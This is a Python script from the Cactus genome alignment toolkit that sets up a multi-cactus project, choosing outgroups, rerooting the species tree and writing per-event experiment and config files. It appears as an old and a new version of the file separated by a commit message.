            outgroupPath = CactusPreprocessor.getOutputSequenceFiles(expTemplate.getSequences() + options.rootOutgroupPaths[:i+1], expTemplate.getOutputSequenceDir())[-1]
            rootOutgroupName = "rootOutgroup%d" % i
            expTemplate.seqMap[rootOutgroupName] = outgroupPath
            # Add to tree
            mcProj.mcTree.addOutgroup(rootOutgroupName, outgroupDist)
            mcProj.mcTree.computeSubtreeRoots()
            if mcProj.mcTree.getRootName() not in mcProj.outgroup.ogMap:
                # initialize ogMap entry
                mcProj.outgroup.ogMap[mcProj.mcTree.getRootName()] = []
            mcProj.outgroup.ogMap[mcProj.mcTree.getRootName()].append((rootOutgroupName, outgroupDist))
    #Now do the file tree creation
    createFileStructure(mcProj, expTemplate, confTemplate, options)
    # mcProj.check()
# mcProj.check()
def main():
    """Command-line entry point: parse options, validate inputs, and build
    the multi-cactus project directory structure."""
    usage = "usage: %prog [options] <experiment> <output project path>"
    description = "Setup a multi-cactus project using an experiment xml as template"
    parser = OptionParser(usage=usage, description=description)
    parser.add_option("--fixNames", dest="fixNames", default = "True",
                      help="try to make sequence and event names MAF-compliant [default=true]")
    parser.add_option("--outgroupNames", dest="outgroupNames", default = None,
                      help="comma-separated names of high quality assemblies to use as outgroups [default=everything]")
    parser.add_option("--root", dest="root", type=str,
                      help="name of alignment root (must be labeled ancestral node in tree in input experiment). Useful "
                      "for allowing the tree to contain nodes that won't be in the alignment but can still be used for "
                      "outgroups.",
                      default=None)
    parser.add_option("--overwrite", action="store_true", help="Overwrite existing experiment files", default=False)
    options, args = parser.parse_args()
    if len(args) != 2:
        parser.print_help()
        raise RuntimeError("Wrong number of arguments")
    options.expFile = args[0]
    options.path = os.path.abspath(args[1])
    options.name = os.path.basename(options.path)
    # --fixNames arrives as a string; anything but "false" enables fixing
    options.fixNames = not options.fixNames.lower() == "false"
    if (os.path.isdir(options.path) and not options.overwrite) or os.path.isfile(options.path):
        raise RuntimeError("Output project path %s exists\n" % options.path)
    expTemplate = ExperimentWrapper(ET.parse(options.expFile).getroot())
    configPath = expTemplate.getConfigPath()
    confTemplate = ConfigWrapper(ET.parse(configPath).getroot())
    if options.fixNames:
        cleanEventTree(expTemplate)
    checkInputSequencePaths(expTemplate)
    tree = expTemplate.getTree()
    # Check that the tree is sensible (root has at least 1 child)
    if len(tree.getChildren(tree.getRootId())) == 0:
        raise RuntimeError("Input species tree has only one node.")
    # validate any user-specified outgroups against the tree's leaves
    if options.outgroupNames is not None:
        projNames = set([tree.getName(x) for x in tree.getLeaves()])
        options.outgroupNames = set(options.outgroupNames.split(","))
        for outgroupName in options.outgroupNames:
            if outgroupName not in projNames:
                raise RuntimeError("Specified outgroup %s not found in tree" % outgroupName)
    mcProj = createMCProject(tree, expTemplate, confTemplate, options)
    #Replace the sequences with output sequences
    expTemplate.updateTree(mcProj.mcTree, expTemplate.buildSequenceMap())
    expTemplate.setSequences(CactusPreprocessor.getOutputSequenceFiles(mcProj.inputSequences, expTemplate.getOutputSequenceDir()))
    #Now do the file tree creation
    createFileStructure(mcProj, expTemplate, confTemplate, options)
    # mcProj.check()
    return 0
# script entry point
if __name__ == '__main__':
    main()
Fix warnings about paths not existing when using s3:// paths
#!/usr/bin/env python
#Copyright (C) 2011 by Glenn Hickey
#
#Released under the MIT license, see LICENSE.txt
#!/usr/bin/env python
"""Create the multi_cactus xml and directory structure from a workflow template
"""
import os
import sys
from optparse import OptionParser
import xml.etree.ElementTree as ET
import copy
from cactus.progressive.multiCactusProject import MultiCactusProject
from cactus.progressive.multiCactusTree import MultiCactusTree
from cactus.shared.experimentWrapper import ExperimentWrapper
from cactus.shared.configWrapper import ConfigWrapper
from cactus.progressive.outgroup import GreedyOutgroup, DynamicOutgroup
from sonLib.nxnewick import NXNewick
from cactus.preprocessor.cactus_preprocessor import CactusPreprocessor
def createMCProject(tree, experiment, config, options):
    """Build a MultiCactusProject: tree decomposition plus outgroup assignment.

    The input species tree is wrapped in a MultiCactusTree, unnamed internal
    nodes are named, and one sub-experiment xml path is registered per subtree
    root. Outgroups are then chosen according to the configured strategy, and
    the tree is finally rerooted at the requested alignment root (see
    specifyAlignmentRoot).

    tree: species tree taken from the experiment template
    experiment: ExperimentWrapper template
    config: ConfigWrapper template
    options: object providing path, root and outgroupNames
    Returns the populated MultiCactusProject.
    Raises RuntimeError for an unknown root name or outgroup strategy.
    """
    mcTree = MultiCactusTree(tree, config.getSubtreeSize())
    mcTree.nameUnlabeledInternalNodes(config.getDefaultInternalNodePrefix())
    mcTree.computeSubtreeRoots()
    mcProj = MultiCactusProject()
    mcProj.mcTree = mcTree
    # copy so later reassignment doesn't alias the experiment's list
    mcProj.inputSequences = experiment.getSequences()[:]
    mcProj.outputSequenceDir = experiment.getOutputSequenceDir()
    if config.getDoSelfAlignment():
        mcTree.addSelfEdges()
    # one sub-experiment xml per subtree root, under <project path>/<name>/
    for name in mcProj.mcTree.getSubtreeRootNames():
        expPath = "%s/%s/%s_experiment.xml" % (options.path, name, name)
        mcProj.expMap[name] = os.path.abspath(expPath)
    alignmentRootId = mcProj.mcTree.getRootId()
    if options.root is not None:
        try:
            alignmentRootId = mcProj.mcTree.getNodeId(options.root)
        except:
            raise RuntimeError("Specified root name %s not found in tree" % options.root)
    mcProj.outgroup = None
    if config.getOutgroupStrategy() == 'greedy':
        # use the provided outgroup candidates, or use all outgroups
        # as candidates if none are given
        mcProj.outgroup = GreedyOutgroup()
        mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
        mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
                               candidateSet=options.outgroupNames,
                               candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
                               maxNumOutgroups=config.getMaxNumOutgroups())
    elif config.getOutgroupStrategy() == 'greedyLeaves':
        # use all leaves as outgroups, unless outgroup candidates are given
        mcProj.outgroup = GreedyOutgroup()
        mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
        ogSet = options.outgroupNames
        if ogSet is None:
            ogSet = set([mcProj.mcTree.getName(x) for x in mcProj.mcTree.getLeaves()])
        mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
                               candidateSet=ogSet,
                               candidateChildFrac=2.0,
                               maxNumOutgroups=config.getMaxNumOutgroups())
    elif config.getOutgroupStrategy() == 'greedyPreference':
        # prefer the provided outgroup candidates, if any, but use
        # other nodes as "filler" if we can't find enough.
        mcProj.outgroup = GreedyOutgroup()
        mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
        mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
                               candidateSet=options.outgroupNames,
                               candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
                               maxNumOutgroups=config.getMaxNumOutgroups())
        # second pass with no candidate restriction fills remaining slots
        mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
                               candidateSet=None,
                               candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
                               maxNumOutgroups=config.getMaxNumOutgroups())
    elif config.getOutgroupStrategy() == 'dynamic':
        # dynamic programming algorithm that exactly optimizes probability
        # that base in target node aligns to at least one base in the
        # outgroup set. Caveats are that it only returns leaves, and
        # the model used for optimization is super naive. Still, it does
        # some things better than greedy approaches such as properly account
        # for phylogenetic redundancy, as well as try to factor assembly
        # size/quality automatically.
        mcProj.outgroup = DynamicOutgroup()
        mcProj.outgroup.importTree(mcProj.mcTree, mcProj.getInputSequenceMap(), alignmentRootId,
                                   candidateSet=options.outgroupNames)
        mcProj.outgroup.compute(maxNumOutgroups=config.getMaxNumOutgroups())
    elif config.getOutgroupStrategy() != 'none':
        raise RuntimeError("Could not understand outgroup strategy %s" % config.getOutgroupStrategy())
    # if necessary, we reroot the tree at the specified alignment root id. all leaf genomes
    # that are no longer in the tree, but still used as outgroups, are moved into special fields
    # so that we can remember to, say, get their paths for preprocessing.
    specifyAlignmentRoot(mcProj, alignmentRootId)
    return mcProj
# it is possible that we start with a much bigger tree than we actually want to align
# (controlled by the --root option in cactus_createMultiCactusProject.py). We use
# the entire tree when selecting outgroups, but right afterward have no use for
# genomes that are neither outgroups, nor in the alignment. We especially don't
# want to waste time preprocessing them. This function reroots the tree at the
# alignment root then tacks on all the outgroups from outside the new tree
# (which must be leaves) as children of the root
def specifyAlignmentRoot(mcProj, alignmentRootId):
    """Reroot the project tree at alignmentRootId.

    Leaf genomes that fall outside the new subtree but are still used as
    outgroups are re-attached as children of the new root and remembered in
    mcProj.externalOutgroupNames (e.g. so their paths can still be found for
    preprocessing). Experiment entries for removed nodes are dropped and
    mcProj.inputSequences is rebuilt in postorder over the new tree.
    """
    # ugly hack to keep track of external outgroups for root experiment (yuck)
    mcProj.externalOutgroupNames = set()
    # keep around the entire un-rerooted tree so that we can calculate
    # the induced species trees for each node correctly -- gross!
    mcProj.entireTree = copy.deepcopy(mcProj.mcTree)
    # nothing to do
    if alignmentRootId == mcProj.mcTree.getRootId():
        return
    # dig out every outgroup
    outGroupNames = set()
    if mcProj.outgroup is not None:
        for event, ogNameDistList in mcProj.outgroup.ogMap.items():
            for og, dist in ogNameDistList:
                outGroupNames.add(og)
    # i don't like this but we have to assume here that the sequences are
    # written in postorder (as in experiments)
    allLeafMap = dict()
    idx = 0
    for node in mcProj.mcTree.postOrderTraversal():
        if mcProj.mcTree.isLeaf(node) is True:
            allLeafMap[mcProj.mcTree.getName(node)] = mcProj.inputSequences[idx]
            idx += 1
    # find outgroups we want to extract
    keptNodes = set([x for x in mcProj.mcTree.postOrderTraversal(alignmentRootId)])
    deadNodes = []
    extractOutgroupMap = dict()
    for node in mcProj.mcTree.postOrderTraversal():
        if node not in keptNodes:
            deadNodes.append(node)
            name = mcProj.mcTree.getName(node)
            if name in outGroupNames:
                assert name in allLeafMap
                extractOutgroupMap[name] = allLeafMap[name]
                mcProj.externalOutgroupNames.add(name)
    # reroot the tree!
    mcProj.mcTree.reroot(alignmentRootId)
    # add the outgroups to the tree (and sequence map)
    # computing distance to new root for each one
    for ogName, ogPath in extractOutgroupMap.items():
        ogId = mcProj.mcTree.getNodeId(ogName)
        dist = 0.
        x = ogId
        while mcProj.mcTree.hasParent(x):
            d = mcProj.mcTree.getWeight(mcProj.mcTree.getParent(x), x)
            if d is None:
                # any unknown branch length makes the whole distance unknown
                dist = None
                break
            else:
                dist += d
            x = mcProj.mcTree.getParent(x)
        mcProj.mcTree.addOutgroup(ogName, dist)
        allLeafMap[ogName] = ogPath
    # remove any experiment directories that have become invalid.
    # iterate a snapshot of the keys: deleting from a dict while iterating
    # its live key view raises RuntimeError on Python 3
    for event in list(mcProj.expMap.keys()):
        if mcProj.mcTree.getNodeId(event) in deadNodes:
            del mcProj.expMap[event]
    # flush out all unused nodes, and set the new root
    for node in deadNodes:
        assert mcProj.mcTree.hasParent(node)
        mcProj.mcTree.removeEdge(mcProj.mcTree.getParent(node), node)
    # reset input sequences to only contain genomes in tree (making sure to
    # keep in postorder)
    mcProj.inputSequences = []
    for node in mcProj.mcTree.postOrderTraversal():
        if mcProj.mcTree.isLeaf(node):
            mcProj.inputSequences.append(allLeafMap[mcProj.mcTree.getName(node)])
# go through the tree (located in the template experiment)
# and make sure event names are unique up until the first dot
def cleanEventTree(experiment):
    """Sanitize event names in the experiment's species tree, in place.

    Unnamed internal nodes get names, dots in names are replaced with
    underscores (warning on stderr), a missing branch length raises, and
    duplicate names are made unique by appending a counter. The cleaned tree
    is written back into the experiment xml and its sequence map is rebuilt.
    """
    tree = MultiCactusTree(experiment.getTree())
    tree.nameUnlabeledInternalNodes()
    for node in tree.breadthFirstTraversal():
        if tree.hasName(node):
            name = tree.getName(node)
            if '.' in name:
                newName = name.replace('.', '_')
                sys.stderr.write('WARNING renaming event %s to %s\n' %(name, newName))
                tree.setName(node, newName)
                name = newName
        parent = tree.getParent(node)
        if parent is not None:
            weight = tree.getWeight(parent, node)
            if weight is None:
                raise RuntimeError('Missing branch length in species_tree tree')
    # keep renaming until a full pass over all node pairs finds no duplicates
    redoPrefix = True
    newSuffix = 0
    while redoPrefix is True:
        redoPrefix = False
        for node1 in tree.breadthFirstTraversal():
            name1 = tree.getName(node1)
            for node2 in tree.breadthFirstTraversal():
                name2 = tree.getName(node2)
                if node1 != node2 and name1 == name2:
                    newName = "%s%i" % (name2, newSuffix)
                    newSuffix += 1
                    tree.setName(node2, newName)
                    sys.stderr.write('WARNING renaming event %s to %s\n' % (
                        name2, newName))
                    redoPrefix = True
    experiment.xmlRoot.attrib["species_tree"] = NXNewick().writeString(tree)
    experiment.seqMap = experiment.buildSequenceMap()
# Make the subdirs for each subproblem: name/ and name/name_DB
# and write the experiment files
# and copy over a config with updated reference field
def createFileStructure(mcProj, expTemplate, configTemplate, options):
    """Write the on-disk layout for every subproblem of the project.

    For each event in mcProj.expMap this creates <path>/<name>/ and
    <path>/<name>/<name>_DB, writes a per-event experiment XML (derived
    from expTemplate) and a per-event config copy whose reference field
    is set to the event name.  Also writes the top-level project XML.
    """
    if not os.path.exists(options.path):
        os.makedirs(options.path)
    mcProj.writeXML(os.path.join(options.path, "%s_project.xml" % options.name))
    # NOTE: seqMap aliases expTemplate.seqMap and is mutated below.
    seqMap = expTemplate.seqMap
    portOffset = 0
    # First sweep: register every event's reference fasta in the sequence
    # map so the subtrees extracted below can resolve ancestral events too.
    for eventName in mcProj.expMap.keys():
        eventDir = os.path.join(options.path, eventName)
        seqMap[eventName] = os.path.join(eventDir, eventName + '.fa')
    for eventName, expPath in mcProj.expMap.items():
        eventDir = os.path.join(options.path, eventName)
        children = mcProj.entireTree.getChildNames(eventName)
        exp = copy.deepcopy(expTemplate)
        # Collect the outgroups assigned to this subproblem, if any.
        outgroups = []
        if configTemplate.getOutgroupStrategy() != 'none' \
           and eventName in mcProj.outgroup.ogMap:
            for og, ogDist in mcProj.outgroup.ogMap[eventName]:
                assert og in seqMap, "No sequence found for outgroup: %s" % og
                outgroups.append(og)
        # Subtree connecting this event's children plus its outgroups.
        assert len(children) > 0
        subtree = mcProj.entireTree.extractSpanningTree(children + outgroups)
        dbBase = eventDir
        if expTemplate.getDbDir() is not None:
            dbBase = os.path.abspath(expTemplate.getDbDir())
        exp.setDbDir(os.path.join(dbBase, eventName, "%s_DB" % eventName))
        # Kyoto Tycoon databases get a .kch name (unless the event name
        # already carries that extension) and a unique port per event.
        if expTemplate.getDbType() == "kyoto_tycoon" and \
           os.path.splitext(eventName)[1] != ".kch":
            exp.setDbName("%s.kch" % eventName)
        else:
            exp.setDbName(eventName)
        if expTemplate.getDbType() == "kyoto_tycoon":
            exp.setDbPort(expTemplate.getDbPort() + portOffset)
            portOffset += 1
            dbHost = expTemplate.getDbHost()
            if dbHost is not None:
                exp.setDbHost(dbHost)
        exp.setReferencePath(os.path.join(eventDir, eventName + '.fa'))
        if configTemplate.getBuildHal() == True:
            exp.setHALPath(os.path.join(eventDir, "%s_hal.c2h" % eventName))
        if configTemplate.getBuildFasta() == True:
            exp.setHALFastaPath(os.path.join(eventDir, "%s_hal.fa" % eventName))
        exp.updateTree(subtree, seqMap, outgroups)
        exp.setConfigPath(os.path.join(eventDir, "%s_config.xml" % eventName))
        if not os.path.exists(exp.getDbDir()):
            os.makedirs(exp.getDbDir())
        if not os.path.exists(eventDir):
            os.makedirs(eventDir)
        exp.writeXML(expPath)
        # Per-event config copy with the reference field pointed at this event.
        config = ConfigWrapper(copy.deepcopy(configTemplate.xmlRoot))
        config.setReferenceName(eventName)
        config.writeXML(exp.getConfigPath())
class CreateMultiCactusProjectOptions:
    """Value object bundling the parameters of a project-creation run.

    Mirrors the attributes that main() attaches to its parsed options,
    so runCreateMultiCactusProject can share code with the CLI path.
    """
    def __init__(self, expFile, projectFile, fixNames,
                 outgroupNames, rootOutgroupDists, rootOutgroupPaths,
                 root, overwrite):
        # Template experiment XML path.
        self.expFile = expFile
        # Output project directory; its basename doubles as the project name.
        self.path = projectFile
        self.name = os.path.basename(self.path)
        # Whether to rewrite event names to be MAF-compliant.
        self.fixNames = fixNames
        self.outgroupNames = outgroupNames
        # Parallel lists describing extra outgroups grafted onto the root.
        self.rootOutgroupDists = rootOutgroupDists
        self.rootOutgroupPaths = rootOutgroupPaths
        # Name of the alignment root event, or None.
        self.root = root
        # Allow writing into an existing project directory.
        self.overwrite = overwrite
def runCreateMultiCactusProject(expFile, projectFile, fixNames=False,
                outgroupNames=None, rootOutgroupDists=None, rootOutgroupPaths=None,
                root=None, overwrite=False):
    """Build a multi-cactus project from an experiment template (library API).

    Programmatic counterpart of main(): parse the experiment XML and its
    config, optionally sanitize event names, decompose the tree into
    subproblems and write the project file structure under projectFile.

    @param expFile: path to the template experiment XML file
    @param projectFile: output project directory; its basename becomes the
        project name
    @param fixNames: when True, rewrite event names to be MAF-compliant
    @param outgroupNames: optional iterable of leaf names allowed as outgroups
    @param rootOutgroupDists: branch lengths for extra root outgroups,
        parallel to rootOutgroupPaths
    @param rootOutgroupPaths: sequence paths for extra outgroups grafted onto
        the root (legacy hack; see the note below and the --root option)
    @param root: name of the alignment root event, or None
    @param overwrite: allow writing into an existing project directory
    @raise RuntimeError: if a requested outgroup is not a leaf of the tree
    """
    options = CreateMultiCactusProjectOptions(expFile, projectFile, fixNames=fixNames,
         outgroupNames=outgroupNames, rootOutgroupDists=rootOutgroupDists,
         rootOutgroupPaths=rootOutgroupPaths, root=root, overwrite=overwrite)
    expTemplate = ExperimentWrapper(ET.parse(options.expFile).getroot())
    configPath = expTemplate.getConfigPath()
    confTemplate = ConfigWrapper(ET.parse(configPath).getroot())
    if options.fixNames:
        cleanEventTree(expTemplate)
    tree = expTemplate.getTree()
    if options.outgroupNames is not None:
        # Validate that every requested outgroup is a leaf of the tree.
        options.outgroupNames = set(options.outgroupNames)
        projNames = set([tree.getName(x) for x in tree.getLeaves()])
        for outgroupName in options.outgroupNames:
            if outgroupName not in projNames:
                raise RuntimeError("Specified outgroup %s not found in tree" % outgroupName)
    mcProj = createMCProject(tree, expTemplate, confTemplate, options)
    #Replace the sequences with output sequences
    expTemplate.updateTree(mcProj.mcTree, expTemplate.buildSequenceMap())
    expTemplate.setSequences(CactusPreprocessor.getOutputSequenceFiles(mcProj.inputSequences, expTemplate.getOutputSequenceDir()))
    if options.rootOutgroupPaths is not None:
        # hacky -- add the root outgroup to the tree after everything
        # else. This ends up being ugly, but avoids running into
        # problems with assumptions about tree structure
        #
        # [this hack is hopefully made redundant by the --root option]
        #
        mcProj.inputSequences.extend(options.rootOutgroupPaths)
        # replace the root outgroup sequence by post-processed output
        for i, (outgroupPath, outgroupDist) in enumerate(zip(options.rootOutgroupPaths, options.rootOutgroupDists)):
            # NOTE(review): outgroupPath from the loop header is immediately
            # shadowed by the preprocessor's output path for this outgroup
            # ([-1] picks the entry for rootOutgroupPaths[i]).
            outgroupPath = CactusPreprocessor.getOutputSequenceFiles(expTemplate.getSequences() + options.rootOutgroupPaths[:i+1], expTemplate.getOutputSequenceDir())[-1]
            rootOutgroupName = "rootOutgroup%d" % i
            expTemplate.seqMap[rootOutgroupName] = outgroupPath
            # Add to tree
            mcProj.mcTree.addOutgroup(rootOutgroupName, outgroupDist)
            mcProj.mcTree.computeSubtreeRoots()
            if mcProj.mcTree.getRootName() not in mcProj.outgroup.ogMap:
                # initialize ogMap entry
                mcProj.outgroup.ogMap[mcProj.mcTree.getRootName()] = []
            mcProj.outgroup.ogMap[mcProj.mcTree.getRootName()].append((rootOutgroupName, outgroupDist))
    #Now do the file tree creation
    createFileStructure(mcProj, expTemplate, confTemplate, options)
    # mcProj.check()
def main():
    """Command-line entry point.

    Parses <experiment> <output project path> plus options, then builds
    the multi-cactus project file tree rooted at the output path.

    @return: 0 on success
    @raise RuntimeError: on bad arguments, an existing output path without
        --overwrite, a degenerate species tree, or an unknown outgroup name
    """
    usage = "usage: %prog [options] <experiment> <output project path>"
    description = "Setup a multi-cactus project using an experiment xml as template"
    parser = OptionParser(usage=usage, description=description)
    # Historical quirk: --fixNames takes a string value ("true"/"false")
    # rather than being a store_true flag; anything but "false"
    # (case-insensitive) enables name fixing.
    parser.add_option("--fixNames", dest="fixNames", default = "True",
                      help="try to make sequence and event names MAF-compliant [default=true]")
    parser.add_option("--outgroupNames", dest="outgroupNames", default = None,
                      help="comma-separated names of high quality assemblies to use as outgroups [default=everything]")
    parser.add_option("--root", dest="root", type=str,
                      help="name of alignment root (must be labeled ancestral node in tree in input experiment). Useful "
                      "for allowing the tree to contain nodes that won't be in the alignment but can still be used for "
                      "outgroups.",
                      default=None)
    parser.add_option("--overwrite", action="store_true", help="Overwrite existing experiment files", default=False)

    options, args = parser.parse_args()

    if len(args) != 2:
        parser.print_help()
        raise RuntimeError("Wrong number of arguments")

    options.expFile = args[0]
    options.path = os.path.abspath(args[1])
    options.name = os.path.basename(options.path)
    # Clearer equivalent of the old double negative
    # (not ... == "false"): everything except "false" means True.
    options.fixNames = options.fixNames.lower() != "false"

    # Refuse to clobber an existing path unless --overwrite was given
    # (a plain file at the target is never acceptable).
    if (os.path.isdir(options.path) and not options.overwrite) or os.path.isfile(options.path):
        raise RuntimeError("Output project path %s exists\n" % options.path)

    expTemplate = ExperimentWrapper(ET.parse(options.expFile).getroot())
    configPath = expTemplate.getConfigPath()
    confTemplate = ConfigWrapper(ET.parse(configPath).getroot())
    if options.fixNames:
        cleanEventTree(expTemplate)
    tree = expTemplate.getTree()

    # Check that the tree is sensible (root has at least 1 child)
    if len(tree.getChildren(tree.getRootId())) == 0:
        raise RuntimeError("Input species tree has only one node.")

    if options.outgroupNames is not None:
        # Validate that every requested outgroup is a leaf of the tree.
        projNames = {tree.getName(x) for x in tree.getLeaves()}
        options.outgroupNames = set(options.outgroupNames.split(","))
        for outgroupName in options.outgroupNames:
            if outgroupName not in projNames:
                raise RuntimeError("Specified outgroup %s not found in tree" % outgroupName)

    mcProj = createMCProject(tree, expTemplate, confTemplate, options)
    # Replace the input sequences with the preprocessor's output sequences.
    expTemplate.updateTree(mcProj.mcTree, expTemplate.buildSequenceMap())
    expTemplate.setSequences(CactusPreprocessor.getOutputSequenceFiles(mcProj.inputSequences, expTemplate.getOutputSequenceDir()))
    # Now do the file tree creation
    createFileStructure(mcProj, expTemplate, confTemplate, options)
    # mcProj.check()
    return 0
if __name__ == '__main__':
    # Propagate main()'s return value (0 on success) as the process exit
    # status instead of silently discarding it.
    sys.exit(main())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.